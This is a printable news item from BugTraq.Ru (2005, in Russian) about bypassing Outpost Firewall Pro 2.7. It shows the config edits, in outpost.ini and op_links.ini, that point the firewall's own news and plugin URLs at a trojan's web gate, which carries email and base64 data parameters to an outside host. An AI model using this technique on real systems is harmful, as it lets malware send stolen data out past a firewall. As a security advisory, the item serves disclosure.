BugTraq.Ru: Обход Outpost 2.7 // версия для печати

https://bugtraq.ru/rsn/archive/2005/09/07.html

Обход Outpost 2.7
dl // 14.09.05 00:56
Проверялась версия Outpost Firewall Pro ver.
[Не забывайте при копировании материала указывать полный адрес источника: //bugtraq.ru/rsn/archive/2005/09/07.html]
2.7.492.5421 (416). Возможна отправка любых данных на web-гейт трояна (напр. pinch 2 pro, a-311 и т.д.), достаточно изменить данные в файлах (пример для русскоязычной версии):

С:\...\Outpost Firewall\outpost.ini
[HttpAlerts]
...
NewsTime=10 //таймаут
NewsEnable=yes //меню->сервис->загружать новости
PluginsTime=10 //таймаут
PluginsEnable=yes //меню->сервис->загружать информацию о модулях
...

С:\...\Outpost Firewall\op_links.ini
NewsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPageAdv_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data

При этом Outpost выдает предупреждение о том, что его главный модуль пытается соединиться с внешним миром, но это выглядит достаточно безобидно.

Источник: $aSH

предложить новость | обсудить | все отзывы (1) [9639]

назад « » вперед

последние новости

Крупный сбой Azure и других сервисов Microsoft // 29.10.25 20:02
Серьезный сбой AWS положил множество сервисов // 20.10.25 12:57
Фишинговая атака на Python-разработчиков // 26.09.25 17:21
ФБР нашла русский след в атаках на древние Cisco // 22.08.25 22:43
Массовый взлом SharePoint // 23.07.25 22:07
Microsoft Authenticator прекращает поддержку паролей // 30.06.25 21:19
Очередное исследование 19 миллиардов паролей показало, что с ними по-прежнему все плохо // 02.05.25 20:42

Комментарии: